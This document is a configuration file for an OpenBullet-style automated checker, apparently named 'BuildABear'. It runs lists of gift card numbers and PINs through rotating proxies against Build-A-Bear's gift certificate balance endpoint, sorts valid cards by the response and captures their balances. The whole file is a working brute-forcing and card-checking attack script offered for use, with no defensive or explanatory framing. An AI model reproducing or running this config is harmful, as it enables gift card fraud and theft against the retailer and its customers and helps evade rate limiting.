[SETTINGS]
{
  "Name": "BuildABear",
  "SuggestedBots": 50,
  "LastModified": "2018-07-09T22:47:41.6156949+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "CardPin",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://www.buildabear.com/on/demandware.store/Sites-buildabear-us-Site/default/SVDotCOBilling-GetGiftCertificateBalance?giftCertificateID=<USER>&giftCertificatePin=<PASS>" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "error" 
  KEYCHAIN Success OR 
    KEY "balance" 
PARSE "<SOURCE>" JSON "balance" Recursive=FALSE -> CAP "BALANCE" "" "" 
